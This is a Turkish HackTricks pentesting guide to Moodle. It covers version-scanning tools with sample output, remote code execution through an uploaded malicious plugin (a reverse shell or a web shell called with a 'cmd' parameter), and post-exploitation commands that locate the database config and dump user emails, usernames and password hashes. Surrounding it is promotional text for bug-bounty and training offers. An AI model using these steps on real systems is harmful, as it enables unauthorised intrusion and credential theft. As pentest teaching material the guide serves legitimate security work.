Moodle

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

Ödül avı ipucu: Intigriti'ye kaydolun, hackerlar tarafından oluşturulan bir premium ödül avı platformu! Bugün https://go.intigriti.com/hacktricks adresinde bize katılın ve $100,000'a kadar ödüller kazanmaya başlayın!

Otomatik Taramalar

droopescan

pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
3.10.0-beta

[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)

moodlescan

moodlescan

#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.

CMSMap

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>

CVE'ler

Otomatik araçların, moodle sürümünü etkileyen zayıflıkları bulmada oldukça yetersiz olduğunu buldum. Bunları buradan kontrol edebilirsin

RCE

Yönetici rolüne sahip olmanız ve "Site yönetimi" sekmesi içinde eklentileri yükleyebilmeniz gerekmektedir**:**

Yönetici olsanız bile, bu seçeneği etkinleştirmeniz gerekebilir. Moodle ayrıcalık yükseltme PoC'da nasıl yapılacağını görebilirsiniz: https://github.com/HoangKien1020/CVE-2020-14321.

Ardından, aşağıdaki eklentiyi yükleyebilirsiniz ki bu klasik pentest-monkey php rev shell içermektedir (yüklemek için önce sıkıştırılmış dosyayı açmanız, revshell'in IP ve portunu değiştirmeniz ve tekrar sıkıştırmanız gerekmektedir)

Ya da "cmd" parametresi ile düzenli bir PHP shell elde etmek için https://github.com/HoangKien1020/Moodle_RCE adresinden eklentiyi kullanabilirsiniz.

Kötü niyetli eklentiyi başlatmak için şuraya erişmeniz gerekmektedir:

http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id

POST

Veritabanı kimlik bilgilerini bulun

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

Veritabanından Kimlik Bilgilerini Alın

/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"

Hata ödülü ipucu: Intigriti'ye kaydolun, hackerlar tarafından oluşturulan bir premium hata ödülü platformu! Bugün https://go.intigriti.com/hacktricks adresinde bize katılın ve 100.000 $'a kadar ödüller kazanmaya başlayın!

Sıfırdan kahramana kadar AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

Last updated